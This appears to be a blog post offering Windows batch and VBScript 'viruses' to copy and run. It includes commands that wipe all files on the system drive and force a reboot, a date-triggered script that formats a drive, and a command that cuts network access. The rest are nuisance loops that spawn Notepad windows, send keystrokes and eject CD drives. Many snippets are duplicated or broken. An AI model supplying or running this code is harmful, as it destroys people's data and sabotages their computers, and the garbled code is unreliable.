Wanna program a virus?????????? Just code it...
Delete All The Content Of A
Drive…
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Disable Internet Permanently
ipconfig/release
The Most Simple Virus To Crush The Window
@Echo
off
Del C:\ *.* |y
Del C:\ *.* |y
Endless Notepads
@ECHO
off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Bomb Virus
Copy
Paste The Following
If
%date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit
format E: /y >nul
:exit
exit
Note:-
You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format
E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day
The Virus Will Take Effect On That Day
Crazy caps lock
*This
constantly turns caps lock on and off really fast continuously*
Code:-
Set
wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Endless Enter
*This
constantly makes it so the enter button is being pressed continuesly*
Code:-
Set
wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Endless Backspace
*This makes it so the backspace key is constantly
being pressed*
Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
What sex is your computer ?
-> open notepad
-> copy code
-> copy code
CreateObject(“SAPI.SpVoice”).Speak”I love YOU”
-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it
-> save as > love.vbs
-> double-click on it
Popping CD Drives
*This
will make the CD drives constantly pop out*
Code:-
Set
oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
Comments
Post a Comment